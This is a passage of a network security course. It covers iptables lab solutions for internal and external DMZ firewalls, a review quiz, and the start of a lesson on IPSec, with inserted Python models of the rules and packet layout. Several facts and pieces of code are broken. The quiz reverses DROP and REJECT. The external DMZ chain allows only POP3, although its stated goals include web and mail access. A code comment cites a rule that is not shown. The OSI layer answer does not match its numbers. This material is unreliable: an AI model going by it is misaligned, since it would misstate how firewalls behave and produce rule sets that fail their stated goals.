DMZ Email Server 192.168.10.100 255.255.255.0
DMZ Web Server 192.168.10.101 255.255.255.0
External Firewall int 3 192.168.10.2 255.255.255.0
External Firewall int 4 10.10.10.10 255.255.0.0
First of all, you need to plan the chains and rules that you will use. Decide if you will create new chains, or use the default chains. Record, on paper, the chains and/or rule sets, and determine if they are correct before you begin implementation. You should always plan the whole process first. Here are some general steps to guide you in this first activity.
1. Decide if you will modify the default policies, and write down what you would modify them to.
2. Decide if you want to create new rules/chains for management, and write them down.
3. In Linux, if you created new chains, define the jumps to these chains.
4. Define the general goals of the firewall.
5. Write down the rules you will configure.
6. Describe how you will verify that the rules and chains are correct.
Once you have your plan written down, it is time for configuration. Using the above steps as your general guidelines, go ahead and configure the firewall to meet the goals you outlined. Remember, there may be several ways to accomplish the overall goals, so no one way is to be considered correct over another. If the goals are met efficiently, then the rules and chains are correct for that scenario.
Suggested Solutions
The following are suggested solutions to the scenario for IPTables. Feel free to compare your results to the suggested results. Again, even though they may be different, as long as the goals are met, the rules and chains are a success.
Configure the default policies to be more restrictive, by using the DROP target:
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP
Create new chains to make configuration easier:
iptables -N in-dmz
iptables -N dmz-in
iptables -N net-in
Configure the jumps to the new chains (the destination in the third jump is the whole internal range, matching the net-in rules that follow):
iptables -A INPUT -s 172.16.0.0/16 -d ! 172.16.0.0/16 -j in-dmz
iptables -A INPUT -s 192.168.10.0/24 -d 172.16.0.0/16 -j dmz-in
iptables -A INPUT -s 0/0 -d 172.16.0.0/16 -j net-in
Dene the overall goals. In this scenario, you are dealing with the packets that
are moving between the internal network to the DMZ, the DMZ to the internal
network, and the Internet to the internal network. Identify what traffic is allowed
in different directions.
From the guidelines given, we can identify the following:
The internal network can access the WWW server on the DMZ and the
Internet.
The DMZ and Internet cannot access WWW on the internal network.
The internal network can access the email server on the DMZ, but not on
the Internet.
The DMZ and Internet cannot access email on the internal network.
The Security Host can Telnet to the DMZ and the Internet.
The DMZ and Internet cannot telnet to the internal network.
The dened internal subnet can FTP to the DMZ and the Internet.
The DMZ and Internet cannot FTP to the internal network.
Ping is allowed in both directions.
Configure the rules.
Based on the guidelines, the following configuration is one suggestion for solving
this scenario. Configure one chain at a time:
iptables -A in-dmz -p TCP -d 192.168.10.101 --dport www -j ACCEPT
iptables -A in-dmz -p TCP -d 192.168.10.100 --dport smtp -j ACCEPT
iptables -A in-dmz -p TCP -d 192.168.10.100 --dport pop3 -j ACCEPT
iptables -A in-dmz -p TCP -s 172.16.10.10/32 -d 0/0 --dport telnet -j ACCEPT
iptables -A in-dmz -p TCP -s 172.16.10.0/24 -d 192.168.10.0/24 --dport 20:21 -j ACCEPT
iptables -A in-dmz -p TCP -d 0/0 --dport www -j ACCEPT
iptables -A in-dmz -p ICMP -d 0/0 -j ACCEPT
iptables -A in-dmz -p 6 -d 0/0 --dport 1024:65535 ! --syn -j ACCEPT
iptables -A in-dmz -p 17 -d 0/0 --dport 1024:65535 -j ACCEPT
iptables -A dmz-in -p ICMP -d 172.16.0.0/16 -j ACCEPT
iptables -A dmz-in -p TCP -d 172.16.0.0/16 --dport 1024:65535 ! --syn -j ACCEPT
iptables -A dmz-in -p UDP -d 172.16.0.0/16 --dport 1024:65535 -j ACCEPT
iptables -A net-in -p 1 -d 172.16.0.0/16 -j ACCEPT
iptables -A net-in -p 6 -d 172.16.0.0/16 --dport 1024:65535 ! --syn -j ACCEPT
iptables -A net-in -p 17 -d 172.16.0.0/16 --dport 1024:65535 -j ACCEPT
As was stated before, this isn't the only possible solution. Compare the solution
you came up with to this one and to the others in the class. Discuss with each
other the different points in each solution.
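Step 6 of the plan asks how you will verify that the rules and chains are correct. The following is an added example, not part of the course material: a small Python model of the suggested internal-firewall rule set with one constructed test packet per goal, so the plan can be checked before anything is loaded on a real firewall. The matching semantics are simplified (no connection tracking, everything evaluated on INPUT as in the lesson), the client address 172.16.100.50 is constructed and 10.10.10.10 stands in for an Internet host; running it shows that the suggested rules, as written, do not cover the "defined subnet can FTP to the Internet" goal, which is exactly the kind of gap this check is meant to surface.

```python
"""Checking a planned iptables rule set against its goals before loading it.
Added example (not course material). Models the subset of iptables matching the
suggested internal-firewall solution uses (-s/-d prefixes, "-d !", -p, --dport
ranges, "! --syn", user chains, DROP policy). No connection tracking, and all
rules sit on INPUT as in the lesson, so only the rule logic is exercised.
"""
import ipaddress
from dataclasses import dataclass
from typing import Optional

@dataclass
class Packet:
    src: str
    dst: str
    proto: str                    # "tcp", "udp" or "icmp" (-p 6, 17 or 1)
    dport: int = 0
    syn: bool = False             # True only for the first segment of a TCP connection

@dataclass
class Rule:
    target: str                   # ACCEPT, DROP or a user-defined chain to jump to
    src: str = "0.0.0.0/0"        # written as 0/0 in the lesson
    dst: str = "0.0.0.0/0"
    neg_dst: bool = False         # models "-d ! 172.16.0.0/16"
    proto: Optional[str] = None
    dports: Optional[tuple] = None   # --dport low:high as (low, high)
    syn: Optional[bool] = None    # False models "! --syn"

    def matches(self, pkt: Packet) -> bool:
        in_src = ipaddress.ip_address(pkt.src) in ipaddress.ip_network(self.src)
        in_dst = ipaddress.ip_address(pkt.dst) in ipaddress.ip_network(self.dst)
        if not in_src or in_dst == self.neg_dst:
            return False
        if self.proto and pkt.proto != self.proto:
            return False
        if self.dports and not self.dports[0] <= pkt.dport <= self.dports[1]:
            return False
        return self.syn is None or pkt.syn == self.syn

class Firewall:
    def __init__(self):
        self.chains = {"INPUT": []}   # user chains are created on first append (-N)

    def append(self, chain: str, rule: Rule) -> None:   # iptables -A <chain> ...
        self.chains.setdefault(chain, []).append(rule)

    def _walk(self, chain: str, pkt: Packet) -> Optional[str]:
        for rule in self.chains[chain]:
            if not rule.matches(pkt):
                continue
            if rule.target in ("ACCEPT", "DROP"):
                return rule.target
            verdict = self._walk(rule.target, pkt)      # -j user-chain
            if verdict:                                 # no match there: fall through
                return verdict
        return None

    def verdict(self, pkt: Packet) -> str:
        return self._walk("INPUT", pkt) or "DROP"        # iptables -P INPUT DROP

INT, DMZ, SUBNET, SECHOST = "172.16.0.0/16", "192.168.10.0/24", "172.16.10.0/24", "172.16.10.10/32"
WEB, MAIL, HIGH = "192.168.10.101/32", "192.168.10.100/32", (1024, 65535)

def internal_firewall() -> Firewall:
    """The suggested internal-firewall solution, rule for rule."""
    fw = Firewall()
    fw.append("INPUT", Rule("in-dmz", src=INT, dst=INT, neg_dst=True))
    fw.append("INPUT", Rule("dmz-in", src=DMZ, dst=INT))
    fw.append("INPUT", Rule("net-in"))      # "-d 172.16.10.0/0": a /0 mask matches everything
    for r in (Rule("ACCEPT", dst=WEB, proto="tcp", dports=(80, 80)),
              Rule("ACCEPT", dst=MAIL, proto="tcp", dports=(25, 25)),
              Rule("ACCEPT", dst=MAIL, proto="tcp", dports=(110, 110)),
              Rule("ACCEPT", src=SECHOST, proto="tcp", dports=(23, 23)),
              Rule("ACCEPT", src=SUBNET, dst=DMZ, proto="tcp", dports=(20, 21)),
              Rule("ACCEPT", proto="tcp", dports=(80, 80)),
              Rule("ACCEPT", proto="icmp"),
              Rule("ACCEPT", proto="tcp", dports=HIGH, syn=False),
              Rule("ACCEPT", proto="udp", dports=HIGH)):
        fw.append("in-dmz", r)
    for chain in ("dmz-in", "net-in"):      # the two chains carry identical rules
        fw.append(chain, Rule("ACCEPT", dst=INT, proto="icmp"))
        fw.append(chain, Rule("ACCEPT", dst=INT, proto="tcp", dports=HIGH, syn=False))
        fw.append(chain, Rule("ACCEPT", dst=INT, proto="udp", dports=HIGH))
    return fw

def check_goals(fw: Firewall) -> dict:
    """Step 6 of the plan: a constructed packet per goal, True when the verdict matches."""
    cases = {  # 10.10.10.10 stands in for an Internet host; 172.16.100.50 is a constructed client
        "internal to DMZ www": (Packet("172.16.100.50", "192.168.10.101", "tcp", 80, True), "ACCEPT"),
        "internal to Internet smtp": (Packet("172.16.100.50", "10.10.10.10", "tcp", 25, True), "DROP"),
        "security host telnet": (Packet("172.16.10.10", "10.10.10.10", "tcp", 23, True), "ACCEPT"),
        "other host telnet": (Packet("172.16.10.11", "10.10.10.10", "tcp", 23, True), "DROP"),
        "subnet ftp to DMZ": (Packet("172.16.10.20", "192.168.10.101", "tcp", 21, True), "ACCEPT"),
        "subnet ftp to Internet": (Packet("172.16.10.20", "10.10.10.10", "tcp", 21, True), "ACCEPT"),
        "DMZ to internal www": (Packet("192.168.10.101", "172.16.100.100", "tcp", 80, True), "DROP"),
        "DMZ reply to internal": (Packet("192.168.10.101", "172.16.100.50", "tcp", 3456, False), "ACCEPT"),
        "DMZ new high-port conn": (Packet("192.168.10.101", "172.16.100.50", "tcp", 3456, True), "DROP"),
    }
    return {goal: fw.verdict(pkt) == want for goal, (pkt, want) in cases.items()}
```

A goal whose entry comes back False is one the rule set does not meet; the same model can be filled with the external-firewall chains to check the second scenario.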
Configuring the External Firewall
After you have configured your firewall to simulate the first scenario, you are
ready to move on to the second scenario. The premise is the same, and the
network layout is the same. The only difference is that this time you are
configuring the rules on the external firewall.
Before we can proceed to congure the rules, we need to remove the chains that
are currently in place. Again, there are different ways to accomplish this, but here
is a suggestion:
1. Flush all rules from all the chains you have created, by using the iptables -F
chainname command.
2. Delete the chains after the rules have been flushed, by using the iptables -X
chainname command.
3. Modify the default policies back to ACCEPT, so that the system is back in the
state it was in when you began this topic (as if no rules or modifications had
taken place at all). Use the iptables -P chain ACCEPT command.
The IP addresses that will be used for this are listed in the following table.
Use                        IP Address       Subnet Mask
Internal Subnet            172.16.10.0      255.255.255.0
Security Host              172.16.10.10     255.255.255.0
Internal Web Server        172.16.100.100   255.255.0.0
Internal Firewall int 1    172.16.100.1     255.255.0.0
Internal Firewall int 2    192.168.10.1     255.255.255.0
DMZ Email Server           192.168.10.100   255.255.255.0
DMZ Web Server             192.168.10.101   255.255.255.0
External Firewall int 3    192.168.10.2     255.255.255.0
External Firewall int 4    10.10.10.10      255.255.0.0
First of all, you need to plan the chains and rules that you will use. Decide if you
will create new chains, or use the default chains. Record, on paper, the chains
and/or rule sets, and determine if they are correct before you begin
implementation. You should always plan the whole process first. Here are some
general steps to guide you in this first activity:
Decide if you will modify the default policies, and write down what you would modify them to.
Decide if you want to create new rules/chains for management, and write them down.
In Linux, if you created new chains, define the jumps to these chains.
Define the general goals of the firewall.
Write down the rules you will configure.
Describe how you will verify that the rules and chains are correct.
Once you have your plan written down, it is time for configuration. Using the
above steps as your general guidelines, go ahead and configure the firewall to
meet the goals you outlined. Remember, there may be several ways to accomplish
the overall goals, so no one way is to be considered correct over another. If the
goals are met efficiently, then the rules and chains are correct for that scenario.
Suggested Solutions
The following are suggested solutions to the scenario for IPTables. Feel free to
compare your results to the suggested results. Again, even though they may be
different, as long as the goals are met, the rules and chains are a success.
Configure the default policies to be more restrictive, by using the DROP target:
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP
Create new chains to make configuration easier:
iptables -N in-net
iptables -N dmz-net
iptables -N net-dmz
iptables -N net-in
Configure the jumps to the new chains, and configure rules against IP spoofing:
iptables -A INPUT -s 172.16.0.0/16 -d 0/0 -i eth1 -j DROP
iptables -A INPUT -s 192.168.0.0/16 -d 0/0 -i eth1 -j DROP
iptables -A INPUT -s 127.0.0.0/8 -d 0/0 -i eth1 -j DROP
iptables -A INPUT -s 172.16.0.0/16 -d ! 172.16.0.0/16 -j in-net
iptables -A INPUT -s 192.168.10.0/24 -d ! 192.168.10.0/24 -j dmz-net
iptables -A INPUT -s 0/0 -d 192.168.10.0/24 -j net-dmz
iptables -A INPUT -s 0/0 -d 172.16.0.0/16 -j net-in
Define the overall goals. In this scenario, you are dealing with the packets that
are moving between the Internet, the internal network, and the DMZ. Identify
what traffic is allowed in each direction.
From the guidelines given, we can identify the following:
The internal network can access the WWW service on the Internet.
The internal network cannot access email on the Internet.
The internal subnet can access FTP on the Internet.
The Security Host can access Telnet on the Internet.
The internal network can ping the Internet.
The DMZ can ping the Internet.
The Internet can access the WWW server on the DMZ.
The Internet can access the email server on the DMZ.
The Internet cannot ping the DMZ.
The Internet cannot ping the internal network.
Configure the rules.
Based on the above guidelines, the following configuration is one suggestion for
solving this scenario. Configure one chain at a time (note that the upper end of
the unprivileged port range is 65535; a larger value is rejected by iptables):
iptables -A in-net -p TCP -d 0/0 --dport www -j ACCEPT
iptables -A in-net -p TCP -s 172.16.10.0/24 -d 0/0 --dport 20:21 -j ACCEPT
iptables -A in-net -p TCP -s 172.16.10.10/32 -d 0/0 --dport telnet -j ACCEPT
iptables -A in-net -p ICMP -d 0/0 -j ACCEPT
iptables -A in-net -p TCP -d 0/0 --dport 1024:65535 ! --syn -j ACCEPT
iptables -A in-net -p UDP -d 0/0 --dport 1024:65535 -j ACCEPT
iptables -A dmz-net -p ICMP -d 0/0 -j ACCEPT
iptables -A dmz-net -p TCP -d 0/0 --dport 1024:65535 ! --syn -j ACCEPT
iptables -A dmz-net -p UDP -d 0/0 --dport 1024:65535 -j ACCEPT
iptables -A net-dmz -p TCP -d 192.168.10.100 --dport pop3 -j ACCEPT
As was stated before, this isn't the only possible solution. Compare the solutions
you came up with to this one and to the others in the class. Discuss with each
other the different points in each solution.
Summary
In this lesson, you worked with standard firewall implementation practices.
You learned that vendors implement their firewall products slightly differently
from each other, but that they do follow some standard implementation
practices in most situations. You worked with two industry leaders in
firewall systems: Microsoft's ISA Server 2006, and Linux's embedded
firewall, IPTables.
Lesson Review
5A What is a network firewall?
A firewall can be described as a security mechanism that places limitation
controls on all inbound and outbound network communications between
individual systems or entire networks of systems by permitting, denying, or
acting as a proxy for all data connections.
What is a firewall's primary responsibility?
Controlling access requests across differing zones of trust.
Name six basic building blocks or elements of firewall access rules.
Source Address, Destination Address, Protocol, Source Port, Destination
Port, and Service.
What layers of the OSI model do firewalls operate on?
Data Link, Network, Transport, Session and Application Layers (2, 3, 4, and
7).
What does it mean when a firewall is stateful?
The firewall keeps track of the state of all accepted connections in a data
table that resides in memory. This enables the firewall to determine if an
incoming packet is either a new connection or is part of an existing
established connection.
What are the three common firewall topologies?
Perimeter topology, three-legged DMZ topology, and chained DMZ topology.
5B True or False? You need to have the install partition formatted to NTFS
when installing ISA Server 2006 on a Windows 2003 Server.
True
Is ISA Server Firewall available in a firewall appliance?
Yes! There are a wide range of manufacturers that offer ISA-based
appliances.
What are the three panes in the ISA Server 2006 Management console?
Console Tree, Details, and Task panes.
List some things that can be a trigger for an ISA alert.
Responses might include Event Log Failure, Intrusion Detected, IP Spoofing,
and Oversize UDP Packet.
How do you back up or restore the configuration of ISA Server 2006?
By exporting or importing the configuration to an XML file.
What is the difference between an access rule and a publishing rule in ISA
Server 2006?
Access rules control outbound communication, while publishing rules control
inbound communication.
What are the features in ISA Server 2006 that can help manage bandwidth
consumption?
Forward and reverse caching and packet prioritization.
5C What is the difference between the DROP target and the REJECT target?
Dropping the connection complies with TCP/IP rules of communication: an
ICMP message is sent back to the packet's origin. Rejecting the connection
simply drops a packet and does not inform the sender.
What must be done before a chain can be deleted?
You must flush the rules.
What is the switch for deleting a rule?
-D deletes a rule (-F flushes and -X deletes a chain).
5D What is the function of --dport 1024:65535 ! --syn in the exercises?
Destination port should be in the range 1024-65535, but without the SYN
flag set.
Why is the filtering of ping done in two lines, first disallowing
echo-requests, and then allowing ICMP?
Because there are many uses for ICMP other than ping, such as Timed Out
and Host Unreachable messages, closing all ICMP would cause problems.
Why is it a good idea to configure the default policies first?
Because those configurations are instant, no one can sneak through the
firewall while the policies are being created.
Lesson 6: Implementing IPSec and VPNs
Overview
In this lesson, you will be introduced to the concepts of IPSec. You will
examine and configure the Microsoft Management Console and identify the
predefined IPSec policies in Windows Server 2003. You will create new
policies and implement IPSec to specifically use AH, ESP, or both, in Trans-
port Mode. Finally, you will analyze IPSec traffic in Network Monitor.
In this lesson, you will examine Virtual Private Networks (VPNs) and some
of the security issues related to them.
Objectives
To be able to implement IPSec and Virtual Private Networks, you will:
6A Define the function of IPSec in a networked environment.
Given a running network, you will examine the IPSec structure, cryptog-
raphy, the Encapsulating Security Payload, the Authentication Header, the
Internet Key Exchange, and modes of Implementation.
6B Examine IPSec policy management.
Given a running network, you will examine the IPSec structure, cryptog-
raphy, the Encapsulating Security Payload, the Authentication Header, the
Internet Key Exchange, and modes of implementation.
6C Implement and examine IPSec AH configurations.
Given a Windows 2003 computer, you will implement and analyze IPSec
AH sessions.
6D Implement and examine IPSec AH and ESP configurations.
Given a Windows 2003 computer, you will implement and analyze IPSec
AH and ESP sessions.
6E Examine the business drivers and technology components for a VPN.
In this topic, you will examine standard business drivers and technology
components in order to successfully implement a VPN solution.
6F Examine the concepts of IPSec and other tunneling protocols.
In this topic, you will investigate the components of IPSec, how IPSec
works and identify other VPN tunneling protocols, such as Point-to-Point
Tunneling Protocol (PPTP) and Layer 2 Tunneling Protocol (L2TP).
Data Files: RFCs
Lesson Time: 3 hours
6G Analyze secure VPN design and implementation issues.
In this topic, you will take the necessary steps required to analyze secure
VPN design objectives and VPN implementation issues.
6H Examine the issues of VPN and firewall architecture and VPN
authentication.
In this topic, you will address various VPN and firewall architectures and
examine issues related to authentication.
6I Configure VPN options built into Windows 2003.
In this topic, you will perform tasks related to setting up the VPN options
built into Windows 2003 Server.
Topic 6A
Internet Protocol Security
The Internet Protocol (IP) by itself has no security. There are no built-in mecha-
nisms to ensure the security of the packets. It has become possible for attackers
to create bogus packets, posing as IP addresses that they are not. It has also
become possible for attackers to intercept packets as they are transmitted on the
Internet, and read into the payload of the packets. Due to the above-mentioned
points, there is no way for the security professional to guarantee any of the
following:
That a packet is from the source IP address.
That a packet was not copied or intercepted by a third party during transmission.
That a packet holds the original data that was transmitted.
These issues combine to illustrate that security of the packets themselves is
required.
IPSec, or IP Security (described in detail in RFC 2401), can provide this security.
In the simplest definition, IPSec protects IP datagrams. In a more detailed
definition, IPSec provides confidentiality, integrity, and authentication.
Confidentiality means there is a system of making the data unreadable by unauthorized individuals.
Integrity means that there is a guarantee that data is not altered between the sender and the receiver.
Authentication means that the receiver is guaranteed that the sender is not an imposter.
The way that IPSec is able to provide this protection is by specifying how the
network traffic is going to be protected, and to whom the traffic will be sent. The
way the traffic is going to be protected will be through an IPSec protocol such as
the Authentication Header (AH) or the Encapsulating Security Payload (ESP).
The operation of IPSec is completely transparent to the end-user. This is due to
the fact that IPSec functions just above the Network layer (the IPSec protocols
AH and ESP have their own IP protocol IDs), so they are well under the Application
layer. Providing this automatic protection is significant in the choice of
whether or not to implement IPSec. The end result is that network traffic is
encrypted on one end and decrypted on the other, without the upper-layer applica-
tions at either end worrying about the complexities of the encryption/decryption
processes.
Cryptography and Keys
IPSec is able to provide protection by encrypting and decrypting data. Although a
detailed discussion of cryptography is beyond the scope of this book, the very
basics are required. (A detailed discussion and hands-on study of cryptography
and encryption techniques will be undertaken in Level 2 of the SCP.)
Any file before encryption is typically referred to as plaintext. Once that file is
encrypted, using a mathematical algorithm, it is referred to as ciphertext. In order
to decrypt this file (or message), you must have a key that can reverse the
encryption. You can think of an encryption algorithm as a lock and the key as the
lock's combination. If a document is locked, you need a key to unlock it. Often
in cryptography, one key is used to lock (encrypt) the document, and the same
key or a different key is used to unlock (decrypt) the document, depending upon
the methodology chosen. If a different key is used, the two keys are linked to
each other via the algorithm and the associated mathematical functions.
IPSec requires that users have a method of exchanging (sometimes called
negotiating) their keys.
One method is called manual distribution. In the simplest definition, this literally means each user manually giving every other user his or her key. Manual distribution will more likely be done with what is called a KDC, or Key Distribution Center.
The second method is automatic distribution. With automatic distribution, the concept is that keys are exchanged only when needed. The default IPSec implementation of automatic key distribution is called Internet Key Exchange (IKE). You can also implement an automated version of the KDC, such as a Kerberos implementation.
Modes
IPSec has the ability to protect either the complete IP packet or just the upper-
layer protocols. The distinction between the two creates two different modes of
implementation.
One mode is called Transport Mode. In this implementation, IPSec is protecting upper-layer protocols.
The other mode is called Tunnel Mode. In this implementation, IPSec protects the entire (tunneled) IP payload.
When Transport Mode is used, the IPSec headers (AH and/or ESP) are inserted
between the IP header and the TCP header. When Tunnel Mode is used, the
IPSec header is inserted between the original IP header (now tunneled) and a new
IP header. Tunnel Mode is commonly used to create VPNs between networks.
Along with specifying a mode, the actual decision on the use of AH and/or ESP
(or the other way around) is required. Since there are two modes of implementa-
tion, and two protocols that can be selected, there are four possible methods of
protection using IPSec. You can use any of the following:
ESP in Transport Mode
ESP in Tunnel Mode
AH in Transport Mode
AH in Tunnel Mode
Over and above that, ESP offers message integrity (authentication) and
confidentiality (encryption). AH offers only message integrity. Tunnel Mode ESP
encryption encrypts all of the tunneled data (that is, the tunneled IP header and
everything within), while Transport Mode ESP does not, and cannot, encrypt the
IP header. Thus the IPSec implementation that offers the maximum protection is
ESP in Tunnel Mode.
cryptography: The art or science concerning the principles, means, and methods for rendering plaintext unintelligible and for converting encrypted messages into intelligible form.
plaintext: Unencrypted data.
key: A symbol or sequence of symbols (or electrical or mechanical correlates of symbols) applied to text in order to encrypt or decrypt.
ESP in Transport Mode
In Transport Mode, ESP encrypts and authenticates application data, such as
email, web pages, and so forth; however, it does not protect the IP addresses. If a
packet is captured and analyzed by an attacker, although the data is encrypted,
the sender and receiver IP address information is freely available. Both hosts that
are in communication must have IPSec installed and configured to prevent this
from occurring.
ESP in Tunnel Mode
In Tunnel Mode, ESP encrypts and authenticates application data, just as in
Transport Mode. In this situation, the ultimate source and destination IP addresses
are also encrypted because they are encapsulated (tunneled). The reason for this
is that IPSec is implemented on the tunnel endpoints, and not required on the
hosts themselves. If this packet is captured and analyzed by an attacker, the
attacker will be able to determine only that a packet was sent. None of the con-
tents, including the original source and destination, can be found freely. Of
course, the external IP headers (that of the tunnel endpoints) can be read.
AH in Transport Mode
AH provides authentication of application data. AH does not provide encryption
services like ESP, only authentication services (as the name indicates). In Transport
Mode, there is similarity to ESP, though, in that both end users must have
IPSec installed and configured.
AH in Tunnel Mode
In Tunnel Mode, AH authenticates application data from one endpoint to another,
often network gateways or firewalls. There is no encryption provided, only
authentication. If ESP authentication is turned on, then AH is rarely implemented
in Tunnel Mode.
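The four combinations above differ mainly in where the IPSec header sits and what is left readable on the wire. The following is an added example, not from the course or any IPSec implementation: a toy Python packet model that places AH and ESP where the text describes (transport mode between the IP header and the TCP data, tunnel mode between a new outer IP header and the whole original packet) and reports what a passive capture shows in each case. The keys, the tunnel endpoint addresses and the keystream "cipher" are constructed stand-ins (the standard library has no DES/3DES), so the layout is faithful but the ciphers are not; integrity uses HMAC-SHA1, one of the IKE settings discussed later in this lesson.

```python
"""Where AH and ESP sit in a packet, and what each mode leaves readable on the wire.

Added example, not from the course or any IPSec implementation. Only the header
placement is faithful: the toy keystream stands in for DES/3DES, and the keys and
addresses are constructed.
"""
import hashlib
import hmac
import json

ENC_KEY = b"constructed-esp-encryption-key"     # constructed sample keys, not IKE output
AUTH_KEY = b"constructed-ah-esp-auth-key"

def _toy_cipher(key: bytes, data: bytes) -> bytes:
    """NOT a real cipher: an HMAC-derived keystream XOR standing in for DES/3DES."""
    stream = b"".join(hmac.new(key, i.to_bytes(4, "big"), hashlib.sha256).digest()
                      for i in range(len(data) // 32 + 1))
    return bytes(a ^ b for a, b in zip(data, stream))

def _icv(data: bytes) -> str:
    """Integrity check value over the protected bytes (HMAC-SHA1)."""
    return hmac.new(AUTH_KEY, data, hashlib.sha1).hexdigest()

def plain_packet(src: str, dst: str, app_data: bytes) -> dict:
    """Unprotected packet: IP header, then the TCP segment with application data."""
    return {"ip": {"src": src, "dst": dst, "proto": "TCP"}, "data": app_data}

def esp_transport(pkt: dict) -> dict:
    """ESP inserted after the host's own IP header; that header stays in clear."""
    ct = _toy_cipher(ENC_KEY, pkt["data"])
    return {"ip": {**pkt["ip"], "proto": "ESP"},
            "esp": {"spi": 0x1001, "ciphertext": ct, "icv": _icv(ct)}}

def esp_tunnel(pkt: dict, gw_src: str, gw_dst: str) -> dict:
    """ESP after a new outer header naming the gateways; the original packet is inside."""
    inner = json.dumps(pkt["ip"]).encode() + b"\x00" + pkt["data"]
    ct = _toy_cipher(ENC_KEY, inner)
    return {"ip": {"src": gw_src, "dst": gw_dst, "proto": "ESP"},
            "esp": {"spi": 0x1002, "ciphertext": ct, "icv": _icv(ct)}}

def esp_tunnel_decap(pkt: dict) -> dict:
    """Receiving gateway: verify the ICV before decrypting, then restore the original."""
    esp = pkt["esp"]
    if not hmac.compare_digest(_icv(esp["ciphertext"]), esp["icv"]):
        raise ValueError("ESP integrity check failed")
    hdr, data = _toy_cipher(ENC_KEY, esp["ciphertext"]).split(b"\x00", 1)
    return {"ip": json.loads(hdr), "data": data}

def ah_transport(pkt: dict) -> dict:
    """AH after the IP header: addresses and payload are authenticated, not hidden."""
    covered = f'{pkt["ip"]["src"]}|{pkt["ip"]["dst"]}'.encode() + pkt["data"]
    return {"ip": {**pkt["ip"], "proto": "AH"},
            "ah": {"spi": 0x2001, "icv": _icv(covered)}, "data": pkt["data"]}

def ah_verify(pkt: dict) -> bool:
    """Recompute the AH ICV; any change to the addresses or payload fails it."""
    covered = f'{pkt["ip"]["src"]}|{pkt["ip"]["dst"]}'.encode() + pkt["data"]
    return hmac.compare_digest(_icv(covered), pkt["ah"]["icv"])

def observer_view(pkt: dict) -> dict:
    """What a capture on the wire shows without any key (payload is None under ESP)."""
    return {"src": pkt["ip"]["src"], "dst": pkt["ip"]["dst"],
            "proto": pkt["ip"]["proto"], "payload": pkt.get("data")}

if __name__ == "__main__":
    # Constructed scenario using the lesson's addresses: internal web server to DMZ
    # web server, with the two firewalls (172.16.100.1 and 192.168.10.2) as endpoints.
    orig = plain_packet("172.16.100.100", "192.168.10.101", b"GET / HTTP/1.0")
    for label, p in (("ESP transport", esp_transport(orig)),
                     ("ESP tunnel", esp_tunnel(orig, "172.16.100.1", "192.168.10.2")),
                     ("AH transport", ah_transport(orig))):
        print(label, observer_view(p))
```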
IPSec Implementation
As you identified in the previous section, there are various modes of implementing
IPSec. One of the primary questions to answer is: Where are the endpoints in
your network going to be? Are the endpoints the actual hosts? Or, are the
endpoints the firewalls?
If true end-to-end security is required between two hosts, then implementing
IPSec on each host is the way to go. However, scaling that up to all the hosts in
the network can become difficult to implement and manage.
Imagine that you and your coworkers all pass open notes to each other in your
organization. In order to prevent a third user from seeing the note sent between
any two users, you build an infrastructure of opaque PVC pipes between each
coworker in your organization. If there are a total of five workers, you have to
have an infrastructure of [5 x (5 - 1)]/2, or 10 pipes. In this office, each person
holds four pipes. Now, increase the number of workers to 100. You will need an
infrastructure of [100 x (100 - 1)]/2, or 4950 pipes, and each person holds 99
pipes. Lots of secure links to pass things back and forth through, but not that
efficient overall.
authenticate: To establish the validity of a claimed user or object.
firewall: A system or combination of systems that enforces a boundary between two or more networks. A gateway that limits access between networks in accordance with local security policy. The typical firewall is an inexpensive micro-based UNIX box kept clean of critical data, with many modems and public network ports on it, but just one carefully watched connection back to the rest of the cluster.
This is what happens when you implement IPSec in Transport Mode: you basically
create many virtual secure pipes between each host and the rest of the hosts.
If host-to-host implementation is chosen, the likely solution will be to use the
IPSec function of the OS, such as Windows 2000. If this is the case, IPSec func-
tions normally, at the Network layer, performing its function and moving on.
Sometimes though, IPSec may be implemented underneath an existing implemen-
tation of the IP protocol stack, between the native IP and the local network
drivers (see RFC 2401). In such a scenario, this is referred to as a Bump in the
Stack implementation.
Yet another option for IPSec implementation is to use a dedicated piece of
hardware. This equipment would attach to an interface, or a router, and perform
the specic encryption functions externally of other components. This is called a
Bump in the Wire implementation. This offers excellent performance in regards
to the processing of encryption and decryption. It is not suitable for all imple-
mentations, however, as adding a physical dedicated piece of equipment to links
may not be a budgetary option for an organization.
TASK 6A-1
Describing the Need for IPSec
1. Why is IPSec becoming a requirement in networks that need secure
communication?
There is no security in the standard IP that is used today. IP can be cap-
tured, analyzed, and more with no prevention. IPSec allows for the security
of the actual packets themselves, without relying on Application-level
encryption.
Topic 6B
IPSec Policy Management
Implementing and managing IPSec policies in Windows is accomplished by using
the Microsoft Management Console. In this topic, you will use the MMC to per-
form the many tasks of IPSec implementation.
The MMC
Microsoft introduced the Microsoft Management Console (MMC) in Windows
NT. The MMC is a highly configurable tool used to manage and configure system
and application settings.
In the first task, you will become familiar with the MMC configuration options
and create some customized settings. The MMC, as you first use it, will be
blank; you select the configuration options. In Figure 6-1, you will see that there
are two places to use a drop-down menu. The first is the overall MMC, called
Console1 by default. This menu bar has three menus: Console, Window, and
Help. The second menu bar contains the commands from the current option, also
called a plug-in. The default plug-in is called Console Root. This has three
commands: Action, View, and Favorites.
In the default plug-in, Console Root, there are two tabs: Tree and Favorites. The
Tree tab shows the items that are available in this plug-in. Items can include fold-
ers, web pages, other snap-ins, and more. The Favorites tab is used to manage
shortcuts to items in the Console Tree. This enables you to create a customized
grouping of tools and shortcuts that you frequently use to manage aspects of your
system.
The Tree and Favorites tabs are located in what is called the Left Pane of the
snap-in. This is where the options are expanded, selected, and possibly added to
Favorites. On the right side of the dividing line is what is called the Right Pane.
In the Right Pane, you will find the details of any object that is selected in the
Left Pane.
Figure 6-1: The blank MMC console.
TASK 6B-1
Examining the MMC
Setup: You are logged on to Windows 2003 Server as Administrator.
1. Choose Start→Run.
2. In the Run box, type mmc to start the Microsoft Management Console.
3. Choose File→Add/Remove Snap-In.
4. On the Standalone tab, click Add.
5. Scroll down, select IP Security Policy Management, and click Add.
6. If necessary, select Local Computer, and click Finish.
7. Click Close to close the Add Standalone Snap-in dialog box.
8. Click OK, and leave the MMC open for the next task.
IPSec Policies
In Windows 2003, there are predefined IPSec security policies. These policies
allow for implementation of IPSec with minimal effort on the part of the
administrator. As an administrator, you must identify the needs for IPSec in your
environment, then enable the proper policy to meet those needs. The three
predefined policies are:
